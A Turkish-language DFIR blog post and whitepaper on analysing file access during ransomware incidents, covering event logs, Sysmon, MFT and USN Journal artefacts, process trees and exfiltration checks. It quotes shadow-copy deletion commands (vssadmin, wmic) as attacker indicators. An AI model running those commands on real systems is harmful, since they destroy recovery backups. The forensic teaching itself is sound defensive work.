src=\"https:\/\/www.youtube.com\/embed\/m_NfVxUCm4E?si=M8daD8Ow4IvfppNs\" width=\"811\" height=\"455\" allowfullscreen=\"allowfullscreen\"><\/iframe><\/h2>\n<h2>Dosya Eri\u015fim Analizi Nedir?<\/h2>\n<p>Dosya eri\u015fim analizi; bir sistemde ransomware taraf\u0131ndan eri\u015filen, de\u011fi\u015ftirilen, olu\u015fturulan veya silinen dosyalar\u0131n tespit edilmesini sa\u011flayan inceleme s&uuml;recidir. Bu analiz sayesinde:<\/p>\n<ul>\n<li>\n<p>Hangi dosyalar\u0131n \u015fifrelendi\u011fi,<\/p>\n<\/li>\n<li>\n<p>Hangi klas&ouml;rlerin hedef al\u0131nd\u0131\u011f\u0131,<\/p>\n<\/li>\n<li>\n<p>Sald\u0131r\u0131n\u0131n ne zaman ba\u015flad\u0131\u011f\u0131,<\/p>\n<\/li>\n<li>\n<p>Hangi kullan\u0131c\u0131 veya i\u015flem taraf\u0131ndan tetiklendi\u011fi,<\/p>\n<\/li>\n<li>\n<p>Yan etkilerin (data exfiltration, dosya &ccedil;al\u0131nmas\u0131 vb.) olup olmad\u0131\u011f\u0131<\/p>\n<\/li>\n<\/ul>\n<p>gibi kritik bilgiler elde edilir.<\/p>\n<hr>\n<h1>1. Ad\u0131m: Log Kaynaklar\u0131n\u0131n Belirlenmesi<\/h1>\n<p>Ransomware incelemelerinde en &ouml;nemli nokta, do\u011fru log kaynaklar\u0131n\u0131 toplamakt\u0131r. Dosya eri\u015fim analizi i&ccedil;in genellikle \u015fu kaynaklar incelenir:<\/p>\n<h3>\u2714 Windows Event Logs<\/h3>\n<ul>\n<li>\n<p><strong>Security Logs (Event ID 4663, 4656)<\/strong><br>Dosya eri\u015fimi, izinsiz de\u011fi\u015fiklikler, handle a&ccedil;ma gibi aktiviteler burada g&ouml;r&uuml;l&uuml;r.<\/p>\n<\/li>\n<li>\n<p><strong>Sysmon Logs (Event ID 1, 11, 13)<\/strong><\/p>\n<ul>\n<li>\n<p>Process creation<\/p>\n<\/li>\n<li>\n<p>File creation time change<\/p>\n<\/li>\n<li>\n<p>Registry modification<\/p>\n<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<p>Sysmon etkinse analiz &ccedil;ok daha kolay olur.<\/p>\n<h3>\u2714 NTFS MFT (Master File Table)<\/h3>\n<ul>\n<li>\n<p>Dosya olu\u015fturma, yeniden adland\u0131rma, silme gibi t&uuml;m olaylar\u0131n d&uuml;\u015f&uuml;k seviyede kaydedildi\u011fi yerdir.<\/p>\n<\/li>\n<li>\n<p>Ransomware'ler MFT &uuml;zerinde iz b\u0131rak\u0131r.<\/p>\n<\/li>\n<\/ul>\n<h3>\u2714 USN Journal<\/h3>\n<ul>\n<li>\n<p>Dosya de\u011fi\u015fikliklerinin neredeyse ger&ccedil;ek zamanl\u0131 kayd\u0131<\/p>\n<\/li>\n<li>\n<p>\u015eifreleme i\u015flemleri milyonlarca sat\u0131r log &uuml;retir<\/p>\n<\/li>\n<\/ul>\n<h3>\u2714 Antivirus \/ EDR Loglar\u0131<\/h3>\n<ul>\n<li>\n<p>Impacted files<\/p>\n<\/li>\n<li>\n<p>Blocked actions<\/p>\n<\/li>\n<li>\n<p>Quarantine kay\u0131tlar\u0131<\/p>\n<\/li>\n<\/ul>\n<hr>\n<h1>2. Ad\u0131m: Sald\u0131r\u0131n\u0131n Zaman Aral\u0131\u011f\u0131n\u0131 Belirleme<\/h1>\n<p>Dosya eri\u015fim analizine ba\u015flamadan &ouml;nce sald\u0131r\u0131n\u0131n zaman &ccedil;izelgesi &ccedil;\u0131kar\u0131l\u0131r:<\/p>\n<ul>\n<li>\n<p>\u0130lk \u015fifrelenen dosya zaman\u0131<\/p>\n<\/li>\n<li>\n<p>Ransom note olu\u015fturulma zaman\u0131<\/p>\n<\/li>\n<li>\n<p>\u015e&uuml;pheli s&uuml;re&ccedil; ba\u015flang\u0131c\u0131 (Sysmon Event ID 1)<\/p>\n<\/li>\n<li>\n<p>Volume Shadow Copy silme komutlar\u0131 (wmic, vssadmin)<\/p>\n<\/li>\n<\/ul>\n<p>Bu zaman aral\u0131\u011f\u0131 daralt\u0131l\u0131r ve t&uuml;m analiz bu timeframe &uuml;zerinde yap\u0131l\u0131r.<\/p>\n<hr>\n<h1>3. Ad\u0131m: Dosya Eri\u015fim &Ouml;r&uuml;nt&uuml;lerinin Tespiti<\/h1>\n<p>Ransomware karakteristik dosya eri\u015fim davran\u0131\u015flar\u0131 sergiler:<\/p>\n<h3>\ud83d\udccc Anormal Dosya Olu\u015fturma<\/h3>\n<ul>\n<li>\n<p>ayn\u0131 anda y&uuml;zlerce dosyan\u0131n yeniden adland\u0131r\u0131lmas\u0131 (file.ext &rarr; file.ext.locked)<\/p>\n<\/li>\n<li>\n<p>.README.txt, <em>R3ADME<\/em>.html gibi not dosyalar\u0131<\/p>\n<\/li>\n<\/ul>\n<h3>\ud83d\udccc Uzant\u0131 De\u011fi\u015fiklikleri<\/h3>\n<ul>\n<li>\n<p>AES \u015fifreleme sonras\u0131 yeni bir uzant\u0131 eklenmesi (.dark, .encrypted vb.)<\/p>\n<\/li>\n<\/ul>\n<h3>\ud83d\udccc Y&uuml;ksek I\/O Aktivitesi<\/h3>\n<ul>\n<li>\n<p>K\u0131sa s&uuml;rede binlerce dosya olu\u015fturma\/silme<\/p>\n<\/li>\n<li>\n<p>Sysinternals Process Monitor ile kolayca tespit edilir<\/p>\n<\/li>\n<\/ul>\n<h3>\ud83d\udccc Dosya Metadata Manip&uuml;lasyonu<\/h3>\n<ul>\n<li>\n<p>CreationTime \/ ModifiedTime de\u011fi\u015ftirmeleri<\/p>\n<\/li>\n<li>\n<p>Sysmon Event ID 2 \/ 11 ile tespit edilebilir<\/p>\n<\/li>\n<\/ul>\n<hr>\n<h1>4. Ad\u0131m: USN Journal Analizi<\/h1>\n<p>Ransomware davran\u0131\u015f\u0131n\u0131 en net g&ouml;steren alanlardan biri <strong>USN Journal<\/strong>&rsquo;d\u0131r. &Ccedil;&uuml;nk&uuml; \u015fifreleme s\u0131ras\u0131nda y&uuml;zlerce:<\/p>\n<ul>\n<li>\n<p><code>USN_REASON_DATA_TRUNCATION<\/code><\/p>\n<\/li>\n<li>\n<p><code>USN_REASON_FILE_CREATE<\/code><\/p>\n<\/li>\n<li>\n<p><code>USN_REASON_RENAME_OLD_NAME<\/code><\/p>\n<\/li>\n<li>\n<p><code>USN_REASON_RENAME_NEW_NAME<\/code><\/p>\n<\/li>\n<\/ul>\n<p>olay\u0131 g&ouml;r&uuml;n&uuml;r.<\/p>\n<h3>Kullan\u0131lan Ara&ccedil;lar:<\/h3>\n<ul>\n<li>\n<p><strong>AnalyzeMFT<\/strong><\/p>\n<\/li>\n<li>\n<p><strong>MFTECmd (Eric Zimmerman)<\/strong><\/p>\n<\/li>\n<li>\n<p><strong>UsnJrnl2Csv<\/strong><\/p>\n<\/li>\n<li>\n<p><strong>Velociraptor Forensics<\/strong><\/p>\n<\/li>\n<\/ul>\n<hr>\n<h1>5. Ad\u0131m: MFT Analizi<\/h1>\n<p>MFT analizi ile:<\/p>\n<ul>\n<li>\n<p>\u015eifrelenen dosyalar\u0131n tam listesi<\/p>\n<\/li>\n<li>\n<p>Ransomware&rsquo;in olu\u015fturdu\u011fu ge&ccedil;ici dosyalar<\/p>\n<\/li>\n<li>\n<p>Silinmi\u015f fakat h&acirc;l&acirc; referans\u0131 bulunan dosyalar<\/p>\n<\/li>\n<li>\n<p>Yo\u011fun eri\u015fim yap\u0131lan dizinler<\/p>\n<\/li>\n<\/ul>\n<p>gibi bilgiler &ccedil;\u0131kar\u0131labilir.<\/p>\n<h3>Komut:<\/h3>\n<pre><code>MFTECmd.exe -f $MFT --csv .\\output\\\n<\/code><\/pre>\n<hr>\n<h1>6. Ad\u0131m: S&uuml;re&ccedil; (Process) Tespiti<\/h1>\n<p>Dosya eri\u015fimlerinin arkas\u0131nda hangi i\u015flem var?<\/p>\n<p>Bunu bulmak i&ccedil;in a\u015fa\u011f\u0131daki kaynaklar incelenir:<\/p>\n<h3>\u2714 Sysmon - Event ID 1 (Process Create)<\/h3>\n<ul>\n<li>\n<p>\u015e&uuml;pheli EXE dosyalar\u0131<\/p>\n<\/li>\n<li>\n<p>Temp, AppData, Roaming alt\u0131ndan &ccedil;al\u0131\u015fan uygulamalar<\/p>\n<\/li>\n<li>\n<p>Powershell, cmd, wscript &ccedil;a\u011fr\u0131lar\u0131<\/p>\n<\/li>\n<\/ul>\n<h3>\u2714 Handle Analizi (Ransomware o an &ccedil;al\u0131\u015f\u0131yorsa)<\/h3>\n<ul>\n<li>\n<p>Sysinternals <strong>handle.exe<\/strong><\/p>\n<\/li>\n<li>\n<p>Hangi proses hangi dosyalar\u0131 kilitliyor?<\/p>\n<\/li>\n<\/ul>\n<h3>\u2714 Parent-Child Chain<\/h3>\n<p>&Ouml;rnek k&ouml;t&uuml; zincir:<\/p>\n<pre><code>outlook.exe &rarr; winword.exe &rarr; powershell.exe &rarr; payload.exe\n<\/code><\/pre>\n<hr>\n<h1>7. Ad\u0131m: Etkilenen Dosyalar\u0131n Haritalanmas\u0131<\/h1>\n<p>Toplanan t&uuml;m log kaynaklar\u0131 birle\u015ftirilerek:<\/p>\n<ul>\n<li>\n<p>Etkilenen dizinler<\/p>\n<\/li>\n<li>\n<p>\u015eifrelenen dosya say\u0131s\u0131<\/p>\n<\/li>\n<li>\n<p>Kullan\u0131c\u0131 bazl\u0131 eri\u015fim<\/p>\n<\/li>\n<li>\n<p>Dosya boyutu de\u011fi\u015fimi<\/p>\n<\/li>\n<li>\n<p>En son eri\u015fim zamanlar\u0131<\/p>\n<\/li>\n<\/ul>\n<p>gibi bilgiler bir rapor haline getirilir.<\/p>\n<h3>&Ouml;rnek CSV &Ccedil;\u0131kt\u0131s\u0131:<\/h3>\n<table>\n<thead>\n<tr>\n<th>Dosya<\/th>\n<th>Eski Ad<\/th>\n<th>Yeni Ad<\/th>\n<th>Son Eri\u015fim<\/th>\n<th>\u0130\u015flem<\/th>\n<\/tr>\n<\/thead>\n<tbody>\n<tr>\n<td>C:\\data\\report.xlsx<\/td>\n<td>report.xlsx<\/td>\n<td>report.xlsx.locked<\/td>\n<td>12:41<\/td>\n<td>Rename + Write<\/td>\n<\/tr>\n<tr>\n<td>C:\\data\\finances.db<\/td>\n<td>finances.db<\/td>\n<td>finances.db.enc<\/td>\n<td>12:42<\/td>\n<td>Overwrite<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<hr>\n<h1>8. Ad\u0131m: Data Exfiltration Kontrol&uuml; (Varsa)<\/h1>\n<p>Baz\u0131 modern ransomware gruplar\u0131 &ouml;nce <strong>verileri &ccedil;alar<\/strong>, sonra \u015fifreleme yapar.<\/p>\n<p>\u015eu kaynaklara bak\u0131l\u0131r:<\/p>\n<ul>\n<li>\n<p>Powershell Invoke-WebRequest kay\u0131tlar\u0131<\/p>\n<\/li>\n<li>\n<p>Browser download\/upload ge&ccedil;mi\u015fi<\/p>\n<\/li>\n<li>\n<p>Cloud depolama istemcileri (Mega, Dropbox CLI)<\/p>\n<\/li>\n<li>\n<p>SMB transfer loglar\u0131<\/p>\n<\/li>\n<li>\n<p>WinRar \/ 7zip ile b&uuml;y&uuml;k ar\u015fiv olu\u015fturma loglar\u0131<\/p>\n<\/li>\n<\/ul>\n<hr>\n<h1>9. Ad\u0131m: Otomatikle\u015ftirilmi\u015f Ara&ccedil;lar<\/h1>\n<h3>\ud83d\udd27 Eric Zimmerman Tools<\/h3>\n<ul>\n<li>\n<p>MFTECmd<\/p>\n<\/li>\n<li>\n<p>SrumECmd<\/p>\n<\/li>\n<li>\n<p>EvtxECmd<\/p>\n<\/li>\n<li>\n<p>UsnJrnl2Csv<\/p>\n<\/li>\n<\/ul>\n<h3>\ud83d\udd27 Velociraptor<\/h3>\n<ul>\n<li>\n<p>Ransomware IOC templatelar\u0131<\/p>\n<\/li>\n<li>\n<p>USN\/MFT Collector<\/p>\n<\/li>\n<\/ul>\n<h3>\ud83d\udd27 KAPE<\/h3>\n<p>H\u0131zl\u0131 triage i&ccedil;in ideal.<\/p>\n<hr>\n<p>Ransomware incelemelerinde dosya eri\u015fim analizi, sald\u0131r\u0131n\u0131n etkisini ortaya &ccedil;\u0131karmak i&ccedil;in kritik &ouml;neme sahiptir. Log kaynaklar\u0131n\u0131n toplanmas\u0131, MFT\/USN journal analizi, process takibi ve zaman &ccedil;izelgesi olu\u015fturulmas\u0131 sayesinde:<\/p>\n<ul>\n<li>\n<p>Etkilenen dosyalar<\/p>\n<\/li>\n<li>\n<p>Sald\u0131r\u0131 zinciri<\/p>\n<\/li>\n<li>\n<p>Kullan\u0131lan ara&ccedil;lar<\/p>\n<\/li>\n<li>\n<p>Sald\u0131r\u0131n\u0131n ba\u015flang\u0131&ccedil; zaman\u0131<\/p>\n<\/li>\n<\/ul>\n<p>net bi&ccedil;imde tespit edilir.<\/p>\n<p>Bu analizler yaln\u0131zca olay m&uuml;dahale ekipleri i&ccedil;in de\u011fil, ayn\u0131 zamanda gelecekte benzer sald\u0131r\u0131lar\u0131 &ouml;nlemek isteyen kurumlar i&ccedil;in de b&uuml;y&uuml;k de\u011ferlidir.<\/p>\n<p>&nbsp;<\/p>\n<h1><strong>WHITEPAPER<\/strong><\/h1>\n<h2><strong>Ransomware \u0130ncelemelerinde Dosya Eri\u015fim Analizi<\/strong><\/h2>\n<h3><em>Tehdit Av\u0131, Adli Bili\u015fim ve Olay M&uuml;dahale Perspektifi<\/em><\/h3>\n<hr>\n<h3>&nbsp;<\/h3>\n<p>Ransomware, modern siber sald\u0131r\u0131 ekosisteminin en y\u0131k\u0131c\u0131 tehditlerinden biri h&acirc;line gelmi\u015ftir. Klasik \u015fifreleme odakl\u0131 varianlar yerini, &ccedil;ok a\u015famal\u0131 (multi-stage), veri s\u0131z\u0131nt\u0131l\u0131 (double\/triple extortion) fidye yaz\u0131l\u0131mlar\u0131na b\u0131rakm\u0131\u015ft\u0131r. Bu sald\u0131r\u0131lar yaln\u0131zca veri \u015fifrelemekle kalmaz; sistem &uuml;zerinde geni\u015f dosya eri\u015fim aktivitelerine ve belirgin bir artefakt yo\u011funlu\u011funa neden olur.<\/p>\n<p>Bu whitepaper, ransomware olay m&uuml;dahalesi s\u0131ras\u0131nda <strong>dosya eri\u015fim analizi (File Access Analysis)<\/strong> s&uuml;re&ccedil;lerinin teknik derinli\u011fini aktarmak amac\u0131yla haz\u0131rlanm\u0131\u015ft\u0131r. Analiz; NTFS meta verileri, Windows Event Logs, Sysmon kay\u0131tlar\u0131, USN Journal, MFT, SRUM ve EDR telemetry verileri &uuml;zerinden b&uuml;t&uuml;nle\u015fik bir y&ouml;ntem sunar.<\/p>\n<hr>\n<h1><strong>2. Dosya Eri\u015fim Analizinin Amac\u0131<\/strong><\/h1>\n<p>Dosya eri\u015fim analizi, ransomware sald\u0131r\u0131s\u0131n\u0131n:<\/p>\n<ul>\n<li>\n<p>Ba\u015flang\u0131&ccedil; noktas\u0131n\u0131<\/p>\n<\/li>\n<li>\n<p>Yay\u0131l\u0131m vekt&ouml;r&uuml;n&uuml;<\/p>\n<\/li>\n<li>\n<p>Hangi dosyalar\u0131n manip&uuml;le edildi\u011fini<\/p>\n<\/li>\n<li>\n<p>Hangi kullan\u0131c\u0131\/i\u015flem taraf\u0131ndan tetiklendi\u011fini<\/p>\n<\/li>\n<li>\n<p>Ne kadar veri \u015fifrelendi\u011fini<\/p>\n<\/li>\n<li>\n<p>Veri s\u0131z\u0131nt\u0131s\u0131 olup olmad\u0131\u011f\u0131n\u0131<\/p>\n<\/li>\n<li>\n<p>\u015eifreleme davran\u0131\u015f\u0131n\u0131n metodolojisini<\/p>\n<\/li>\n<\/ul>\n<p>tespit etmek i&ccedil;in uygulan\u0131r.<\/p>\n<p>Bu sayede hem sald\u0131r\u0131n\u0131n boyutu belirlenir hem de hukuki s&uuml;re&ccedil;lerde (SIGORTA, KVKK, GDPR) gerekli olan teknik kan\u0131tlar toplan\u0131r.<\/p>\n<hr>\n<h1><strong>3. Ransomware Dosya Manip&uuml;lasyon Davran\u0131\u015flar\u0131<\/strong><\/h1>\n<p>Ransomware'in dosya sisteminde b\u0131rakt\u0131\u011f\u0131 kal\u0131nt\u0131lar belirli bir paterne sahiptir.<\/p>\n<h3><strong>3.1. Y&uuml;ksek hacimli I\/O operasyonlar\u0131<\/strong><\/h3>\n<ul>\n<li>\n<p>K\u0131sa s&uuml;rede binlerce dosyaya eri\u015fim<\/p>\n<\/li>\n<li>\n<p>&Ccedil;ok say\u0131da <code>CreateFile<\/code>, <code>WriteFile<\/code>, <code>RenameFile<\/code>, <code>SetInformationFile<\/code><\/p>\n<\/li>\n<\/ul>\n<h3><strong>3.2. Uzant\u0131 de\u011fi\u015fikli\u011fi<\/strong><\/h3>\n<ul>\n<li>\n<p><code>*.docx<\/code> &rarr; <code>*.docx.locked<\/code><\/p>\n<\/li>\n<li>\n<p><code>*.pdf<\/code> &rarr; <code>*.encrypted<\/code><\/p>\n<\/li>\n<\/ul>\n<h3><strong>3.3. Metadata manip&uuml;lasyonu<\/strong><\/h3>\n<ul>\n<li>\n<p>CreationTime resetlenmesi<\/p>\n<\/li>\n<li>\n<p>LastWriteTime&rsquo;\u0131n ayn\u0131 saniyede ard\u0131\u015f\u0131k y&uuml;zlerce dosyada g&ouml;r&uuml;nmesi<\/p>\n<\/li>\n<\/ul>\n<h3><strong>3.4. Ransom note olu\u015fturma<\/strong><\/h3>\n<ul>\n<li>\n<p>Ayn\u0131 dizinlere y&uuml;zlerce <code>.txt<\/code> veya <code>.html<\/code> dosyas\u0131 d&uuml;\u015f&uuml;rme<\/p>\n<\/li>\n<li>\n<p>&Ccedil;oklu dizin traversesi<\/p>\n<\/li>\n<\/ul>\n<h3><strong>3.5. Shadow Copy silme<\/strong><\/h3>\n<pre><code>vssadmin delete shadows \/all \/quiet\nwmic shadowcopy delete\n<\/code><\/pre>\n<hr>\n<h1><strong>4. Analiz \u0130&ccedil;in Kullan\u0131lan Temel Kaynaklar<\/strong><\/h1>\n<p>Dosya eri\u015fim analizinin ba\u015far\u0131s\u0131, do\u011fru artefaktlar\u0131n toplanmas\u0131na ba\u011fl\u0131d\u0131r.<\/p>\n<h2><strong>4.1. Windows Event Logs<\/strong><\/h2>\n<h3><strong>Security.evtx<\/strong><\/h3>\n<ul>\n<li>\n<p><strong>4663<\/strong> &rarr; Dosya eri\u015fim denetimi<\/p>\n<\/li>\n<li>\n<p><strong>4656<\/strong> &rarr; Handle a&ccedil;ma giri\u015fimi<\/p>\n<\/li>\n<li>\n<p><strong>4670<\/strong> &rarr; ACL de\u011fi\u015fikli\u011fi<\/p>\n<\/li>\n<li>\n<p><strong>5145<\/strong> &rarr; SMB &uuml;zerinden dosya eri\u015fimi<\/p>\n<\/li>\n<\/ul>\n<h3><strong>Sysmon.evtx<\/strong><\/h3>\n<ul>\n<li>\n<p><strong>1<\/strong> &rarr; Process Create<\/p>\n<\/li>\n<li>\n<p><strong>11<\/strong> &rarr; File Create<\/p>\n<\/li>\n<li>\n<p><strong>13<\/strong> &rarr; Registry Set<\/p>\n<\/li>\n<li>\n<p><strong>2, 17, 18<\/strong> &rarr; Dosya time-stamp manip&uuml;lasyonu<\/p>\n<\/li>\n<li>\n<p><strong>7<\/strong> &rarr; Image Load (crypto library y&uuml;klemeleri)<\/p>\n<\/li>\n<\/ul>\n<hr>\n<h2><strong>4.2. NTFS Artefaktlar\u0131<\/strong><\/h2>\n<h3><strong>4.2.1. MFT ($MFT)<\/strong><\/h3>\n<p>Ransomware faaliyetinin en g&uuml;venilir kan\u0131t\u0131d\u0131r.<\/p>\n<p>Tespit edilebilir:<\/p>\n<ul>\n<li>\n<p>\u015eifrelenen t&uuml;m dosyalar<\/p>\n<\/li>\n<li>\n<p>Silinen ancak iz b\u0131rakan dosya kay\u0131tlar\u0131<\/p>\n<\/li>\n<li>\n<p>Yo\u011fun rename operasyonlar\u0131<\/p>\n<\/li>\n<li>\n<p>Ransom note da\u011f\u0131l\u0131m\u0131<\/p>\n<\/li>\n<\/ul>\n<h3><strong>4.2.2. USN Journal ($UsnJrnl:$J)<\/strong><\/h3>\n<p>Ransomware \u015fifreleme s\u0131ras\u0131nda tipik olarak milyonlarca sat\u0131r aktivite &uuml;retir.<\/p>\n<p>&Ouml;ne &ccedil;\u0131kan USN reason kodlar\u0131:<\/p>\n<ul>\n<li>\n<p><code>0x00000020<\/code> &ndash; File Create<\/p>\n<\/li>\n<li>\n<p><code>0x00000002<\/code> &ndash; Data Overwrite<\/p>\n<\/li>\n<li>\n<p><code>0x00001000<\/code> &ndash; Rename Old Name<\/p>\n<\/li>\n<li>\n<p><code>0x00002000<\/code> &ndash; Rename New Name<\/p>\n<\/li>\n<\/ul>\n<h3><strong>4.2.3. $LogFile<\/strong><\/h3>\n<ul>\n<li>\n<p>Transaction-based kay\u0131t<\/p>\n<\/li>\n<li>\n<p>Ani dosya de\u011fi\u015fiklik paternleri (I\/O spike)<\/p>\n<\/li>\n<\/ul>\n<hr>\n<h2><strong>4.3. SRUM (System Resource Usage Monitor)<\/strong><\/h2>\n<ul>\n<li>\n<p>S&uuml;recin ne kadar I\/O t&uuml;ketti\u011fini<\/p>\n<\/li>\n<li>\n<p>Hangi saatlerde yo\u011fun i\u015flem ger&ccedil;ekle\u015ftirdi\u011fini<\/p>\n<\/li>\n<\/ul>\n<p>g&ouml;sterir.<\/p>\n<hr>\n<h2><strong>4.4. EDR Telemetry<\/strong><\/h2>\n<p>Kurumsal yap\u0131larda en kritik kaynak:<\/p>\n<ul>\n<li>\n<p>File write events<\/p>\n<\/li>\n<li>\n<p>File rename events<\/p>\n<\/li>\n<li>\n<p>Process ancestry<\/p>\n<\/li>\n<li>\n<p>Injection teknikleri<\/p>\n<\/li>\n<li>\n<p>Network exfiltration<\/p>\n<\/li>\n<\/ul>\n<hr>\n<h1><strong>5. Dosya Eri\u015fim Analiz Metodolojisi<\/strong><\/h1>\n<p>Bu b&ouml;l&uuml;m DFIR ekiplerinin kulland\u0131\u011f\u0131 tam metodolojik yakla\u015f\u0131m\u0131 i&ccedil;erir.<\/p>\n<hr>\n<h2><strong>5.1. Zaman &Ccedil;izelgesi (Timeline) Olu\u015fturma<\/strong><\/h2>\n<p>En kritik ad\u0131m <strong>attack window<\/strong>'u belirlemektir.<\/p>\n<p>Zaman aral\u0131\u011f\u0131 \u015fu artefaktlarla belirlenir:<\/p>\n<ul>\n<li>\n<p>\u0130lk \u015fifrelenen dosyan\u0131n <code>MFT LastWriteTime<\/code> bilgisi<\/p>\n<\/li>\n<li>\n<p>\u0130lk ransom note olu\u015fturulma zaman\u0131<\/p>\n<\/li>\n<li>\n<p>Sysmon Process Create (event ID 1) &ndash; Payload ba\u015flatma<\/p>\n<\/li>\n<li>\n<p>SRUM I\/O spike ba\u015flang\u0131c\u0131<\/p>\n<\/li>\n<li>\n<p>EDR taraf\u0131ndan bloklanan ilk event<\/p>\n<\/li>\n<\/ul>\n<p><strong>Ama&ccedil;:<\/strong> Analizi milyonlarca logtan yaln\u0131zca sald\u0131r\u0131 aral\u0131\u011f\u0131na indirgemek.<\/p>\n<hr>\n<h2><strong>5.2. S&uuml;re&ccedil; (Process Tree) Analizi<\/strong><\/h2>\n<h3>&Ouml;rnek malicious zincir:<\/h3>\n<pre><code>outlook.exe\n  \u2514\u2500\u2500 winword.exe\n         \u2514\u2500\u2500 powershell.exe\n               \u2514\u2500\u2500 payload.exe\n<\/code><\/pre>\n<p>\u0130ncelenecekler:<\/p>\n<ul>\n<li>\n<p>Parent PID<\/p>\n<\/li>\n<li>\n<p>Komut sat\u0131r\u0131 arg&uuml;manlar\u0131<\/p>\n<\/li>\n<li>\n<p>Signed\/unsigned binary kontrol&uuml;<\/p>\n<\/li>\n<li>\n<p>Image path (AppData\\Roaming yayg\u0131n)<\/p>\n<\/li>\n<li>\n<p>Masquerading (svch0st.exe gibi)<\/p>\n<\/li>\n<\/ul>\n<hr>\n<h2><strong>5.3. Dosya Manip&uuml;lasyon Haritas\u0131<\/strong><\/h2>\n<h3>3 temel metot uygulan\u0131r:<\/h3>\n<ol>\n<li>\n<p><strong>USN Journal diffs<\/strong><\/p>\n<\/li>\n<li>\n<p><strong>MFT Entry Correlation<\/strong><\/p>\n<\/li>\n<li>\n<p><strong>LastWriteTime s\u0131ralamas\u0131<\/strong><\/p>\n<\/li>\n<\/ol>\n<p>Bu sayede:<\/p>\n<ul>\n<li>\n<p>Ka&ccedil; dosya \u015fifrelendi?<\/p>\n<\/li>\n<li>\n<p>Hangi klas&ouml;rler etkilendi?<\/p>\n<\/li>\n<li>\n<p>Hangi kullan\u0131c\u0131 tokeni kullan\u0131ld\u0131?<\/p>\n<\/li>\n<li>\n<p>Eri\u015fim yo\u011funlu\u011fu hangi drive&rsquo;da?<\/p>\n<\/li>\n<\/ul>\n<p>net olarak &ccedil;\u0131kar.<\/p>\n<hr>\n<h2><strong>5.4. Output Normalizasyon<\/strong><\/h2>\n<p>Toplanan ham veriler CSV\/JSON format\u0131na normalize edilir.<\/p>\n<h3>&Ouml;rnek olay &ccedil;\u0131kt\u0131s\u0131:<\/h3>\n<table>\n<thead>\n<tr>\n<th>Path<\/th>\n<th>Operation<\/th>\n<th>Old Name<\/th>\n<th>New Name<\/th>\n<th>Process<\/th>\n<th>Timestamp<\/th>\n<\/tr>\n<\/thead>\n<tbody>\n<tr>\n<td>C:\\Share\\finance.xlsx<\/td>\n<td>Rename<\/td>\n<td>finance.xlsx<\/td>\n<td>finance.xlsx.enc<\/td>\n<td>payload.exe<\/td>\n<td>2025-01-12 12:41<\/td>\n<\/tr>\n<tr>\n<td>C:\\Share\\db.db<\/td>\n<td>Data Overwrite<\/td>\n<td>-<\/td>\n<td>-<\/td>\n<td>payload.exe<\/td>\n<td>2025-01-12 12:42<\/td>\n<\/tr>\n<tr>\n<td>C:\\Share\\READ_ME.txt<\/td>\n<td>Create<\/td>\n<td>-<\/td>\n<td>-<\/td>\n<td>payload.exe<\/td>\n<td>2025-01-12 12:43<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<hr>\n<h1><strong>6. Veri S\u0131z\u0131nt\u0131s\u0131 (Exfiltration) Analizi<\/strong><\/h1>\n<p>Modern ransomware gruplar\u0131n\u0131n %84&rsquo;&uuml;* veriyi \u015fifrelemeden &ouml;nce &ccedil;alar.<\/p>\n<p>Kontrol edilmesi gerekenler:<\/p>\n<h3><strong>6.1. Network Artefaktlar\u0131<\/strong><\/h3>\n<ul>\n<li>\n<p>Powershell upload komutlar\u0131<\/p>\n<\/li>\n<li>\n<p>Cloud API &ccedil;a\u011fr\u0131lar\u0131<\/p>\n<\/li>\n<li>\n<p>TLS &uuml;zerinden b&uuml;y&uuml;k outbound trafik<\/p>\n<\/li>\n<li>\n<p>C2 ileti\u015fimi (HTTP POST \/ chunked transfer)<\/p>\n<\/li>\n<\/ul>\n<h3><strong>6.2. Ar\u015fivleme G&ouml;stergeleri<\/strong><\/h3>\n<p>Dosya eri\u015fim analizi ile birle\u015fti\u011finde tespit edilir:<\/p>\n<ul>\n<li>\n<p><code>winrar.exe<\/code> &ccedil;al\u0131\u015ft\u0131rma<\/p>\n<\/li>\n<li>\n<p><code>7z.exe a archive.7z<\/code><\/p>\n<\/li>\n<li>\n<p>&Ccedil;ok b&uuml;y&uuml;k boyutlu ge&ccedil;ici dosya olu\u015fumu (&ldquo;collection artifact&rdquo;)<\/p>\n<\/li>\n<\/ul>\n<h3><strong>6.3. SMB Transferleri<\/strong><\/h3>\n<p>Event ID 5145 &uuml;zerinden:<\/p>\n<ul>\n<li>\n<p>Ba\u015fka bir makineye b&uuml;y&uuml;k dosya kopyalama<\/p>\n<\/li>\n<li>\n<p>Y&uuml;ksek hacimli &ldquo;Read&rdquo; operasyonlar\u0131<\/p>\n<\/li>\n<\/ul>\n<hr>\n<h1><strong>7. Ara&ccedil;lar ve Otomasyon<\/strong><\/h1>\n<h2><strong>7.1. Eric Zimmerman Tools<\/strong><\/h2>\n<ul>\n<li>\n<p><strong>MFTECmd.exe<\/strong> &rarr; MFT analizi<\/p>\n<\/li>\n<li>\n<p><strong>UsnJrnl2Csv.exe<\/strong> &rarr; USN analizi<\/p>\n<\/li>\n<li>\n<p><strong>SrumECmd.exe<\/strong> &rarr; I\/O activity<\/p>\n<\/li>\n<li>\n<p><strong>EvtxECmd.exe<\/strong> &rarr; Event log parsing<\/p>\n<\/li>\n<\/ul>\n<h2><strong>7.2. Velociraptor<\/strong><\/h2>\n<ul>\n<li>\n<p>Ransomware IOC pack<\/p>\n<\/li>\n<li>\n<p>Live forensic acquisition<\/p>\n<\/li>\n<li>\n<p>USN\/MFT real-time timeline &ccedil;\u0131karma<\/p>\n<\/li>\n<\/ul>\n<h2><strong>7.3. KAPE (Triage Arac\u0131)<\/strong><\/h2>\n<ul>\n<li>\n<p>Minimal zamanda gerekli t&uuml;m artefaktlar\u0131 toplar<\/p>\n<\/li>\n<\/ul>\n<h2><strong>7.4. Sysinternals Tools<\/strong><\/h2>\n<ul>\n<li>\n<p>Procmon &rarr; Ger&ccedil;ek zamanl\u0131 I\/O<\/p>\n<\/li>\n<li>\n<p>Handle.exe &rarr; Dosya kilidi tespiti<\/p>\n<\/li>\n<\/ul>\n<hr>\n<h1><strong>8. Bulgular\u0131n Raporlanmas\u0131<\/strong><\/h1>\n<p>Whitepaper i&ccedil;eri\u011fi kurum i&ccedil;i forensik ve hukuk ekipleri taraf\u0131ndan kullan\u0131labilir hale getirilmelidir.<\/p>\n<p>Rapor \u015fu b&ouml;l&uuml;mleri 